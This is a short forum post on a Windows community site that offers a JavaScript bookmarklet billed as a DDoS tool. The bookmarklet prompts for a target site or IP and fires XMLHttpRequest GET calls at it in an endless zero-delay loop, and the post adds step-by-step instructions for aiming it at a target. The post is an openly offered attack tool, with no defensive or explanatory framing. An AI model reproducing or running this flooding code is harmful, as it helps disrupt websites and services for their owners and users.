• Donate
    TheWindowsForum.com needs donations to stay online!
    Love TheWindowsForum.com? Then help keep it alive by sending a donation!

Hacxx DDOS XMLHTTPREQUEST JS Bookmarklet

WELCOME TO THEWINDOWSFORUM COMMUNITY!

Our community has more than 63,000 registered members, and we'd love to have you as a member. Join us and take part in our unbiased discussions among people of all different backgrounds about Windows OS, Software, Hardware and more.

hacxx

VIP
May 29, 2021
898
156
Code:
javascript:var keyword = prompt("Type target site or IP! (ex: http://127.0.0.1)", ""); function infinite() { setInterval(function() { var xhr = new XMLHttpRequest(); xhr.open("GET", keyword, true); xhr.send(); }, 0); } infinite();

View online:
 
How to:
1 - Open the browser
2 - Open the address to target
3 - Copy the address
4 - Start the bookmarklet
5 - Write the address
6 - Let the bookmarklet do the task
7 - To close the bookmarklet, close all browser windows
 
Back